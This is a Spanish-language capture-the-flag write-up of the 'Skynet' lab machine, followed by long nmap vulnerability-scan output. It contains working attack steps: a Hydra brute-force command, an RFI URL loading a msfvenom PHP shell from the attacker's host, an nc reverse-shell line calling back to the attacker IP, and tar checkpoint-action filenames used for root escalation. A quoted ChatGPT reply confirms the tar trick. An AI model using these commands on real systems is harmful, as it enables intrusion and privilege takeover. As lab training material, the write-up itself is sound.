🦾SKYNET

1. RECONOCIMIENTO:

Al iniciar con el reconocimiento, me centré en la exploración de directorios del sitio web utilizando gobuster y la lista de palabras comunes common.txt de dirb.

gobuster dir -u http://10.10.131.229 -w /usr/share/wordlists/dirb/common.txt 

Entre los resultados, se destacó el directorio /squirrelmail. Decidí realizar un escaneo de nmap completo para obtener información más detallada y lo guardé en un archivo XML para luego convertirlo a HTML.

nmap -sS -sV -O --script=vuln  10.10.131.229 

Esto proporcionó un informe detallado del escaneo de nmap que fue crucial para la siguiente fase.

2.SERVICIO SAMBA SMB COMPARTIO UN RECURSO SIN CREDENCIALES LLAMADO ANONIMOUS:

El escaneo de nmap reveló los puertos 139 y 445 abiertos, indicando que SMB estaba presente. Utilicé smbclient para enumerar los recursos compartidos SMB.

smbclient -L 10.10.131.229/anonimous

Descubrí un recurso compartido anónimo y exploré su contenido. Encontré el archivo attention.txt que reveló el nombre de usuario Miles Dyson. Además, en log1.txt encontré un conjunto de contraseñas que usaremos para fuerza bruta al login de squirrelmail a posterior.

3. CREDENCIALES DE FUERZA BRUTA obtenidas con HYDRA y vimos tambien con BURPSUITE:

Decidí utilizar las credenciales encontradas para realizar un ataque de fuerza bruta contra el servicio de correo alojado en /squirrelmail. Utilicé Burp Suite Intruder para realizar el ataque de fuerza bruta.

Después de algún tiempo, obtuve la contraseña cyborg007haloterminator. Inicié sesión en el correo electrónico y encontré la clave para la siguiente tarea que era en el servicio SMB.

Y con HYDRA lo logre con el siguiente comando:

hydra -l miles -P passwdskynet.txt 10.10.131.229 http-post-form "/squirrelmail/src/login.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1&Login=Login:<font><b>ERROR</b></font>" -vv -t 1 -stop

4. INICIO EN EL SERVICIO COMPARTIDO POR SAMBA:

Ingresé al recurso compartido SMB milesdyson utilizando las credenciales obtenidas. Exploré el contenido y encontré el archivo important.txt que reveló un directorio secreto oculto.

5. Fuerza bruta de directorio:

Con el directorio oculto /45kra24zxs28v3yd/ descubierto, utilicé gobuster nuevamente para encontrar el panel de administración /administrator que redirige a una página de inicio de sesión en Cuppa CMS.

gobuster dir -u http://10.10.131.229/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirb/common.txt 

6. RFI (Inclusión remota de archivos):

Descubrí una vulnerabilidad de LFI y inclusión remota de archivos (RFI) en Cuppa CMS gracias al script de un exploit que decia qeu explotaba esto. Verifiqué la vulnerabilidad al intentar acceder a /etc/passwd a través del sitio web.

Luego, aproveché la vulnerabilidad RFI para incluir un shell PHP remoto (shellpaimon.php) creado con MSFVENOM sirviendolo en mi servidor python desde mi maquina atacante y enviandolo a CUPPA desde RFI en su URL asi: (http://10.10.131.229/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.10.241.89:8080/shellpaimon.php) y establecer una conexión de escucha con Netcat.

nc -nlvp 4444

Visitando la URL con el payload RFI, logré obtener una shell interactiva.

7. Escalada de privilegios:

Al explorar los cron jobs, encontré un script (backup.sh) ejecutado como root. No pude editarlo directamente, asi qeu creamos unos archivos con touch con nombres especiales que luego TAR los tratara mal como si fueran comandos, y como las cron tabs usaban este TAR para comprimir todo lo que estaba en la ruta html los ejecutara como ROOT y ejecutara shell.sh dandono una shell reverssa y obtener una shell de root en nuestroi netcat a la escucha .

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.241.89 4445 >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"

Con esto, logré obtener una shell de root y completar la máquina.Una máquina Linux vulnerable con temática Terminator.

ESPLICACION DE LA VULNERABILIDAD COMPLETA POR LA QUE SE DIO LA ESCALADA DE PRIVILEGIO:

YO:

mira ahi unas crontab ejecutadas por root, que apuntan a ejecutar este archivo con su contenidio: cat backup.sh #!/bin/bash cd /var/www/html tar cf /home/milesdyson/backups/backup.tgz * . y si vemos este script .sh se va al directorio cd /var/www/html y usa tar para comprimir todo lo que hay en el, sera aqui la bulnerabilidad por parte de como trata tar los nombres especiales e los archivos que creamos antes al comprimirlos y en realidad por esta vulnerabilidad los termina ejecutando como root dandome la shell indirectamente como root en mi netcat ?

ChatGPT:

Sí, parece que has identificado correctamente la posible vulnerabilidad en el script backup.sh que se ejecuta a través de las crontabs como root. Vamos a analizarlo en detalle:

bash Copy code #!/bin/bash cd /var/www/html tar cf /home/milesdyson/backups/backup.tgz * . Aquí se explica lo que hace el script:

Cambia al directorio /var/www/html. Utiliza el comando tar para crear un archivo backup.tgz en el directorio /home/milesdyson/backups. tar cf /home/milesdyson/backups/backup.tgz * . indica que se debe incluir todo (*) en el directorio actual (.) en el archivo backup.tgz. Ahora, si recordamos los archivos que creaste anteriormente:

/var/www/html/--checkpoint-action=exec=sh shell.sh /var/www/html/--checkpoint=1 Parece que podrías aprovechar la vulnerabilidad en la forma en que tar maneja los nombres de archivos especiales. Si el script de copia de seguridad (backup.sh) es ejecutado por root, y tar interpreta de manera incorrecta los nombres de archivos especiales, podrías lograr la ejecución de comandos arbitrarios en el contexto de root.

Esto podría ser un caso de inyección de comandos a través de nombres de archivos maliciosos que son interpretados por tar de manera incorrecta. Será necesario realizar pruebas adicionales para confirmar la explotación de esta vulnerabilidad específica.

// Some code

///////////////////////////////////////////   SKYNET       ///////////////////////////////////////
 
  
Una máquina Linux vulnerable con temática Terminator.




----------------   RECONOCIMIENTO DE LA MAQUINA:   -----------



┌──(root㉿kali)-[~]
└─# ping 10.10.37.190
PING 10.10.37.190 (10.10.37.190) 56(84) bytes of data.
64 bytes from 10.10.37.190: icmp_seq=1 ttl=64 time=0.904 ms
64 bytes from 10.10.37.190: icmp_seq=2 ttl=64 time=0.387 ms
64 bytes from 10.10.37.190: icmp_seq=3 ttl=64 time=0.418 ms
^C
--- 10.10.37.190 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2045ms
rtt min/avg/max/mdev = 0.387/0.569/0.904/0.236 ms







------------------ NMAP     ----------------


┌──(root㉿kali)-[~]
└─# nmap -sS -sV -O --script="vuln" 10.10.37.190
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-03 00:50 UTC
Stats: 0:00:06 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Stats: 0:01:59 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.61% done; ETC: 00:52 (0:00:00 remaining)
Stats: 0:04:11 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.61% done; ETC: 00:54 (0:00:01 remaining)
Stats: 0:04:21 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.61% done; ETC: 00:54 (0:00:01 remaining)
Nmap scan report for ip-10-10-37-190.eu-west-1.compute.internal (10.10.37.190)
Host is up (0.00037s latency).
Not shown: 994 closed tcp ports (reset)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:7.2p2: 
|       PRION:CVE-2016-8858     7.8     https://vulners.com/prion/PRION:CVE-2016-8858
|       PRION:CVE-2016-6515     7.8     https://vulners.com/prion/PRION:CVE-2016-6515
|       PACKETSTORM:140070      7.8     https://vulners.com/packetstorm/PACKETSTORM:140070      *EXPLOIT*
|       EXPLOITPACK:5BCA798C6BA71FAE29334297EC0B6A09    7.8     https://vulners.com/exploitpack/EXPLOITPACK:5BCA798C6BA71FAE29334297EC0B6A09     *EXPLOIT*
|       EDB-ID:40888    7.8     https://vulners.com/exploitdb/EDB-ID:40888      *EXPLOIT*
|       CVE-2016-8858   7.8     https://vulners.com/cve/CVE-2016-8858
|       CVE-2016-6515   7.8     https://vulners.com/cve/CVE-2016-6515
|       1337DAY-ID-26494        7.8     https://vulners.com/zdt/1337DAY-ID-26494        *EXPLOIT*
|       SSV:92579       7.5     https://vulners.com/seebug/SSV:92579    *EXPLOIT*
|       PRION:CVE-2023-35784    7.5     https://vulners.com/prion/PRION:CVE-2023-35784
|       PRION:CVE-2016-10009    7.5     https://vulners.com/prion/PRION:CVE-2016-10009
|       PACKETSTORM:173661      7.5     https://vulners.com/packetstorm/PACKETSTORM:173661      *EXPLOIT*
|       CVE-2023-35784  7.5     https://vulners.com/cve/CVE-2023-35784
|       CVE-2016-10009  7.5     https://vulners.com/cve/CVE-2016-10009
|       1337DAY-ID-26576        7.5     https://vulners.com/zdt/1337DAY-ID-26576        *EXPLOIT*
|       SSV:92582       7.2     https://vulners.com/seebug/SSV:92582    *EXPLOIT*
|       PRION:CVE-2016-10012    7.2     https://vulners.com/prion/PRION:CVE-2016-10012
|       PRION:CVE-2015-8325     7.2     https://vulners.com/prion/PRION:CVE-2015-8325
|       CVE-2016-10012  7.2     https://vulners.com/cve/CVE-2016-10012
|       CVE-2015-8325   7.2     https://vulners.com/cve/CVE-2015-8325
|       SSV:92580       6.9     https://vulners.com/seebug/SSV:92580    *EXPLOIT*
|       PRION:CVE-2016-10010    6.9     https://vulners.com/prion/PRION:CVE-2016-10010
|       CVE-2016-10010  6.9     https://vulners.com/cve/CVE-2016-10010
|       1337DAY-ID-26577        6.9     https://vulners.com/zdt/1337DAY-ID-26577        *EXPLOIT*
|       EXPLOITPACK:98FE96309F9524B8C84C508837551A19    5.8     https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19     *EXPLOIT*
|       EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97    5.8     https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97     *EXPLOIT*
|       EDB-ID:46516    5.8     https://vulners.com/exploitdb/EDB-ID:46516      *EXPLOIT*
|       EDB-ID:46193    5.8     https://vulners.com/exploitdb/EDB-ID:46193      *EXPLOIT*
|       CVE-2019-6111   5.8     https://vulners.com/cve/CVE-2019-6111
|       1337DAY-ID-32328        5.8     https://vulners.com/zdt/1337DAY-ID-32328        *EXPLOIT*
|       1337DAY-ID-32009        5.8     https://vulners.com/zdt/1337DAY-ID-32009        *EXPLOIT*
|       SSV:91041       5.5     https://vulners.com/seebug/SSV:91041    *EXPLOIT*
|       PRION:CVE-2016-3115     5.5     https://vulners.com/prion/PRION:CVE-2016-3115
|       PACKETSTORM:140019      5.5     https://vulners.com/packetstorm/PACKETSTORM:140019      *EXPLOIT*
|       PACKETSTORM:136234      5.5     https://vulners.com/packetstorm/PACKETSTORM:136234      *EXPLOIT*
|       EXPLOITPACK:F92411A645D85F05BDBD274FD222226F    5.5     https://vulners.com/exploitpack/EXPLOITPACK:F92411A645D85F05BDBD274FD222226F     *EXPLOIT*
|       EXPLOITPACK:9F2E746846C3C623A27A441281EAD138    5.5     https://vulners.com/exploitpack/EXPLOITPACK:9F2E746846C3C623A27A441281EAD138     *EXPLOIT*
|       EXPLOITPACK:1902C998CBF9154396911926B4C3B330    5.5     https://vulners.com/exploitpack/EXPLOITPACK:1902C998CBF9154396911926B4C3B330     *EXPLOIT*
|       EDB-ID:40858    5.5     https://vulners.com/exploitdb/EDB-ID:40858      *EXPLOIT*
|       EDB-ID:40119    5.5     https://vulners.com/exploitdb/EDB-ID:40119      *EXPLOIT*
|       EDB-ID:39569    5.5     https://vulners.com/exploitdb/EDB-ID:39569      *EXPLOIT*
|       CVE-2016-3115   5.5     https://vulners.com/cve/CVE-2016-3115
|       SSH_ENUM        5.0     https://vulners.com/canvas/SSH_ENUM     *EXPLOIT*
|       PRION:CVE-2023-27567    5.0     https://vulners.com/prion/PRION:CVE-2023-27567
|       PRION:CVE-2018-15919    5.0     https://vulners.com/prion/PRION:CVE-2018-15919
|       PRION:CVE-2018-15473    5.0     https://vulners.com/prion/PRION:CVE-2018-15473
|       PRION:CVE-2017-15906    5.0     https://vulners.com/prion/PRION:CVE-2017-15906
|       PRION:CVE-2016-10708    5.0     https://vulners.com/prion/PRION:CVE-2016-10708
|       PACKETSTORM:150621      5.0     https://vulners.com/packetstorm/PACKETSTORM:150621      *EXPLOIT*
|       MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS-        5.0     https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS-  *EXPLOIT*
|       EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0    5.0     https://vulners.com/exploitpack/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0     *EXPLOIT*
|       EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283    5.0     https://vulners.com/exploitpack/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283     *EXPLOIT*
|       EDB-ID:45939    5.0     https://vulners.com/exploitdb/EDB-ID:45939      *EXPLOIT*
|       CVE-2018-15919  5.0     https://vulners.com/cve/CVE-2018-15919
|       CVE-2018-15473  5.0     https://vulners.com/cve/CVE-2018-15473
|       CVE-2017-15906  5.0     https://vulners.com/cve/CVE-2017-15906
|       CVE-2016-10708  5.0     https://vulners.com/cve/CVE-2016-10708
|       1337DAY-ID-31730        5.0     https://vulners.com/zdt/1337DAY-ID-31730        *EXPLOIT*
|       PRION:CVE-2019-16905    4.4     https://vulners.com/prion/PRION:CVE-2019-16905
|       PRION:CVE-2023-29323    4.3     https://vulners.com/prion/PRION:CVE-2023-29323
|       PRION:CVE-2016-6210     4.3     https://vulners.com/prion/PRION:CVE-2016-6210
|       EXPLOITPACK:802AF3229492E147A5F09C7F2B27C6DF    4.3     https://vulners.com/exploitpack/EXPLOITPACK:802AF3229492E147A5F09C7F2B27C6DF     *EXPLOIT*
|       EXPLOITPACK:5652DDAA7FE452E19AC0DC1CD97BA3EF    4.3     https://vulners.com/exploitpack/EXPLOITPACK:5652DDAA7FE452E19AC0DC1CD97BA3EF     *EXPLOIT*
|       EDB-ID:40136    4.3     https://vulners.com/exploitdb/EDB-ID:40136      *EXPLOIT*
|       EDB-ID:40113    4.3     https://vulners.com/exploitdb/EDB-ID:40113      *EXPLOIT*
|       CVE-2023-29323  4.3     https://vulners.com/cve/CVE-2023-29323
|       CVE-2020-14145  4.3     https://vulners.com/cve/CVE-2020-14145
|       CVE-2016-6210   4.3     https://vulners.com/cve/CVE-2016-6210
|       1337DAY-ID-25440        4.3     https://vulners.com/zdt/1337DAY-ID-25440        *EXPLOIT*
|       1337DAY-ID-25438        4.3     https://vulners.com/zdt/1337DAY-ID-25438        *EXPLOIT*
|       PRION:CVE-2019-6110     4.0     https://vulners.com/prion/PRION:CVE-2019-6110
|       PRION:CVE-2019-6109     4.0     https://vulners.com/prion/PRION:CVE-2019-6109
|       CVE-2019-6110   4.0     https://vulners.com/cve/CVE-2019-6110
|       CVE-2019-6109   4.0     https://vulners.com/cve/CVE-2019-6109
|       PRION:CVE-2019-6111     2.6     https://vulners.com/prion/PRION:CVE-2019-6111
|       PRION:CVE-2018-20685    2.6     https://vulners.com/prion/PRION:CVE-2018-20685
|       CVE-2018-20685  2.6     https://vulners.com/cve/CVE-2018-20685
|       SSV:92581       2.1     https://vulners.com/seebug/SSV:92581    *EXPLOIT*
|       PRION:CVE-2016-10011    2.1     https://vulners.com/prion/PRION:CVE-2016-10011
|       CVE-2016-10011  2.1     https://vulners.com/cve/CVE-2016-10011
|       PACKETSTORM:151227      0.0     https://vulners.com/packetstorm/PACKETSTORM:151227      *EXPLOIT*
|       PACKETSTORM:140261      0.0     https://vulners.com/packetstorm/PACKETSTORM:140261      *EXPLOIT*
|       PACKETSTORM:138006      0.0     https://vulners.com/packetstorm/PACKETSTORM:138006      *EXPLOIT*
|       PACKETSTORM:137942      0.0     https://vulners.com/packetstorm/PACKETSTORM:137942      *EXPLOIT*
|_      1337DAY-ID-30937        0.0     https://vulners.com/zdt/1337DAY-ID-30937        *EXPLOIT*
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners: 
|   cpe:/a:apache:http_server:2.4.18: 
|       PACKETSTORM:176334      7.5     https://vulners.com/packetstorm/PACKETSTORM:176334      *EXPLOIT*
|       PACKETSTORM:171631      7.5     https://vulners.com/packetstorm/PACKETSTORM:171631      *EXPLOIT*
|       OSV:BIT-APACHE-2023-25690       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2023-25690
|       OSV:BIT-APACHE-2022-31813       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2022-31813
|       OSV:BIT-APACHE-2022-23943       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2022-23943
|       OSV:BIT-APACHE-2022-22720       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2022-22720
|       OSV:BIT-APACHE-2021-44790       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2021-44790
|       OSV:BIT-APACHE-2021-42013       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2021-42013
|       OSV:BIT-APACHE-2021-41773       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2021-41773
|       OSV:BIT-APACHE-2021-39275       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2021-39275
|       OSV:BIT-APACHE-2021-26691       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2021-26691
|       OSV:BIT-APACHE-2020-11984       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2020-11984
|       MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE-       7.5     https://vulners.com/metasploit/MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE- *EXPLOIT*
|       MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH-       7.5     https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH- *EXPLOIT*
|       F9C0CD4B-3B60-5720-AE7A-7CC31DB839C5    7.5     https://vulners.com/githubexploit/F9C0CD4B-3B60-5720-AE7A-7CC31DB839C5  *EXPLOIT*
|       EDB-ID:51193    7.5     https://vulners.com/exploitdb/EDB-ID:51193      *EXPLOIT*
|       EDB-ID:50512    7.5     https://vulners.com/exploitdb/EDB-ID:50512      *EXPLOIT*
|       EDB-ID:50446    7.5     https://vulners.com/exploitdb/EDB-ID:50446      *EXPLOIT*
|       EDB-ID:50406    7.5     https://vulners.com/exploitdb/EDB-ID:50406      *EXPLOIT*
|       E796A40A-8A8E-59D1-93FB-78EF4D8B7FA6    7.5     https://vulners.com/githubexploit/E796A40A-8A8E-59D1-93FB-78EF4D8B7FA6  *EXPLOIT*
|       CVE-2023-25690  7.5     https://vulners.com/cve/CVE-2023-25690
|       CVE-2022-31813  7.5     https://vulners.com/cve/CVE-2022-31813
|       CVE-2022-23943  7.5     https://vulners.com/cve/CVE-2022-23943
|       CVE-2022-22720  7.5     https://vulners.com/cve/CVE-2022-22720
|       CVE-2021-44790  7.5     https://vulners.com/cve/CVE-2021-44790
|       CVE-2021-39275  7.5     https://vulners.com/cve/CVE-2021-39275
|       CVE-2021-26691  7.5     https://vulners.com/cve/CVE-2021-26691
|       CVE-2017-7679   7.5     https://vulners.com/cve/CVE-2017-7679
|       CVE-2017-3169   7.5     https://vulners.com/cve/CVE-2017-3169
|       CVE-2017-3167   7.5     https://vulners.com/cve/CVE-2017-3167
|       CNVD-2022-73123 7.5     https://vulners.com/cnvd/CNVD-2022-73123
|       CNVD-2022-03225 7.5     https://vulners.com/cnvd/CNVD-2022-03225
|       CNVD-2021-102386        7.5     https://vulners.com/cnvd/CNVD-2021-102386
|       CC15AE65-B697-525A-AF4B-38B1501CAB49    7.5     https://vulners.com/githubexploit/CC15AE65-B697-525A-AF4B-38B1501CAB49  *EXPLOIT*
|       9B4F4E4A-CFDF-5847-805F-C0BAE809DBD5    7.5     https://vulners.com/githubexploit/9B4F4E4A-CFDF-5847-805F-C0BAE809DBD5  *EXPLOIT*
|       8713FD59-264B-5FD7-8429-3251AB5AB3B8    7.5     https://vulners.com/githubexploit/8713FD59-264B-5FD7-8429-3251AB5AB3B8  *EXPLOIT*
|       6A0A657E-8300-5312-99CE-E11F460B1DBF    7.5     https://vulners.com/githubexploit/6A0A657E-8300-5312-99CE-E11F460B1DBF  *EXPLOIT*
|       61075B23-F713-537A-9B84-7EB9B96CF228    7.5     https://vulners.com/githubexploit/61075B23-F713-537A-9B84-7EB9B96CF228  *EXPLOIT*
|       5C1BB960-90C1-5EBF-9BEF-F58BFFDFEED9    7.5     https://vulners.com/githubexploit/5C1BB960-90C1-5EBF-9BEF-F58BFFDFEED9  *EXPLOIT*
|       5312D04F-9490-5472-84FA-86B3BBDC8928    7.5     https://vulners.com/githubexploit/5312D04F-9490-5472-84FA-86B3BBDC8928  *EXPLOIT*
|       52E13088-9643-5E81-B0A0-B7478BCF1F2C    7.5     https://vulners.com/githubexploit/52E13088-9643-5E81-B0A0-B7478BCF1F2C  *EXPLOIT*
|       3F17CA20-788F-5C45-88B3-E12DB2979B7B    7.5     https://vulners.com/githubexploit/3F17CA20-788F-5C45-88B3-E12DB2979B7B  *EXPLOIT*
|       22DCCD26-B68C-5905-BAC2-71D10DE3F123    7.5     https://vulners.com/githubexploit/22DCCD26-B68C-5905-BAC2-71D10DE3F123  *EXPLOIT*
|       2108729F-1E99-54EF-9A4B-47299FD89FF2    7.5     https://vulners.com/githubexploit/2108729F-1E99-54EF-9A4B-47299FD89FF2  *EXPLOIT*
|       1337DAY-ID-39214        7.5     https://vulners.com/zdt/1337DAY-ID-39214        *EXPLOIT*
|       1337DAY-ID-38427        7.5     https://vulners.com/zdt/1337DAY-ID-38427        *EXPLOIT*
|       1337DAY-ID-37777        7.5     https://vulners.com/zdt/1337DAY-ID-37777        *EXPLOIT*
|       1337DAY-ID-36952        7.5     https://vulners.com/zdt/1337DAY-ID-36952        *EXPLOIT*
|       1337DAY-ID-34882        7.5     https://vulners.com/zdt/1337DAY-ID-34882        *EXPLOIT*
|       EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB    7.2     https://vulners.com/exploitpack/EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB     *EXPLOIT*
|       EDB-ID:46676    7.2     https://vulners.com/exploitdb/EDB-ID:46676      *EXPLOIT*
|       CVE-2019-0211   7.2     https://vulners.com/cve/CVE-2019-0211
|       1337DAY-ID-32502        7.2     https://vulners.com/zdt/1337DAY-ID-32502        *EXPLOIT*
|       OSV:BIT-APACHE-2021-40438       6.8     https://vulners.com/osv/OSV:BIT-APACHE-2021-40438
|       OSV:BIT-APACHE-2020-35452       6.8     https://vulners.com/osv/OSV:BIT-APACHE-2020-35452
|       FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8    6.8     https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8  *EXPLOIT*
|       CVE-2021-40438  6.8     https://vulners.com/cve/CVE-2021-40438
|       CVE-2020-35452  6.8     https://vulners.com/cve/CVE-2020-35452
|       CVE-2018-1312   6.8     https://vulners.com/cve/CVE-2018-1312
|       CVE-2017-15715  6.8     https://vulners.com/cve/CVE-2017-15715
|       CVE-2016-5387   6.8     https://vulners.com/cve/CVE-2016-5387
|       CNVD-2022-03224 6.8     https://vulners.com/cnvd/CNVD-2022-03224
|       AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C    6.8     https://vulners.com/githubexploit/AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C  *EXPLOIT*
|       8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2    6.8     https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2  *EXPLOIT*
|       4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332    6.8     https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332  *EXPLOIT*
|       4373C92A-2755-5538-9C91-0469C995AA9B    6.8     https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B  *EXPLOIT*
|       36618CA8-9316-59CA-B748-82F15F407C4F    6.8     https://vulners.com/githubexploit/36618CA8-9316-59CA-B748-82F15F407C4F  *EXPLOIT*
|       0095E929-7573-5E4A-A7FA-F6598A35E8DE    6.8     https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE  *EXPLOIT*
|       OSV:BIT-APACHE-2022-28615       6.4     https://vulners.com/osv/OSV:BIT-APACHE-2022-28615
|       OSV:BIT-APACHE-2021-44224       6.4     https://vulners.com/osv/OSV:BIT-APACHE-2021-44224
|       OSV:BIT-2023-31122      6.4     https://vulners.com/osv/OSV:BIT-2023-31122
|       CVE-2022-28615  6.4     https://vulners.com/cve/CVE-2022-28615
|       CVE-2021-44224  6.4     https://vulners.com/cve/CVE-2021-44224
|       CVE-2019-10082  6.4     https://vulners.com/cve/CVE-2019-10082
|       CVE-2017-9788   6.4     https://vulners.com/cve/CVE-2017-9788
|       CVE-2019-0217   6.0     https://vulners.com/cve/CVE-2019-0217
|       OSV:BIT-APACHE-2022-22721       5.8     https://vulners.com/osv/OSV:BIT-APACHE-2022-22721
|       OSV:BIT-APACHE-2020-1927        5.8     https://vulners.com/osv/OSV:BIT-APACHE-2020-1927
|       CVE-2022-22721  5.8     https://vulners.com/cve/CVE-2022-22721
|       CVE-2020-1927   5.8     https://vulners.com/cve/CVE-2020-1927
|       CVE-2019-10098  5.8     https://vulners.com/cve/CVE-2019-10098
|       1337DAY-ID-33577        5.8     https://vulners.com/zdt/1337DAY-ID-33577        *EXPLOIT*
|       OSV:BIT-APACHE-2022-36760       5.1     https://vulners.com/osv/OSV:BIT-APACHE-2022-36760
|       CVE-2022-36760  5.1     https://vulners.com/cve/CVE-2022-36760
|       SSV:96537       5.0     https://vulners.com/seebug/SSV:96537    *EXPLOIT*
|       OSV:BIT-APACHE-2023-45802       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2023-45802
|       OSV:BIT-APACHE-2023-43622       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2023-43622
|       OSV:BIT-APACHE-2023-31122       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2023-31122
|       OSV:BIT-APACHE-2023-27522       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2023-27522
|       OSV:BIT-APACHE-2022-37436       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2022-37436
|       OSV:BIT-APACHE-2022-30556       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2022-30556
|       OSV:BIT-APACHE-2022-30522       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2022-30522
|       OSV:BIT-APACHE-2022-29404       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2022-29404
|       OSV:BIT-APACHE-2022-28614       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2022-28614
|       OSV:BIT-APACHE-2022-28330       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2022-28330
|       OSV:BIT-APACHE-2022-26377       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2022-26377
|       OSV:BIT-APACHE-2022-22719       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2022-22719
|       OSV:BIT-APACHE-2021-41524       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2021-41524
|       OSV:BIT-APACHE-2021-36160       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2021-36160
|       OSV:BIT-APACHE-2021-34798       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2021-34798
|       OSV:BIT-APACHE-2021-33193       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2021-33193
|       OSV:BIT-APACHE-2021-31618       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2021-31618
|       OSV:BIT-APACHE-2021-30641       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2021-30641
|       OSV:BIT-APACHE-2021-26690       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2021-26690
|       OSV:BIT-APACHE-2020-9490        5.0     https://vulners.com/osv/OSV:BIT-APACHE-2020-9490
|       OSV:BIT-APACHE-2020-1934        5.0     https://vulners.com/osv/OSV:BIT-APACHE-2020-1934
|       OSV:BIT-APACHE-2020-13950       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2020-13950
|       OSV:BIT-2023-45802      5.0     https://vulners.com/osv/OSV:BIT-2023-45802
|       OSV:BIT-2023-43622      5.0     https://vulners.com/osv/OSV:BIT-2023-43622
|       F7F6E599-CEF4-5E03-8E10-FE18C4101E38    5.0     https://vulners.com/githubexploit/F7F6E599-CEF4-5E03-8E10-FE18C4101E38  *EXPLOIT*
|       EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D    5.0     https://vulners.com/exploitpack/EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D     *EXPLOIT*
|       EXPLOITPACK:2666FB0676B4B582D689921651A30355    5.0     https://vulners.com/exploitpack/EXPLOITPACK:2666FB0676B4B582D689921651A30355     *EXPLOIT*
|       EDB-ID:42745    5.0     https://vulners.com/exploitdb/EDB-ID:42745      *EXPLOIT*
|       EDB-ID:40909    5.0     https://vulners.com/exploitdb/EDB-ID:40909      *EXPLOIT*
|       E5C174E5-D6E8-56E0-8403-D287DE52EB3F    5.0     https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F  *EXPLOIT*
|       DB6E1BBD-08B1-574D-A351-7D6BB9898A4A    5.0     https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A  *EXPLOIT*
|       CVE-2023-31122  5.0     https://vulners.com/cve/CVE-2023-31122
|       CVE-2022-37436  5.0     https://vulners.com/cve/CVE-2022-37436
|       CVE-2022-30556  5.0     https://vulners.com/cve/CVE-2022-30556
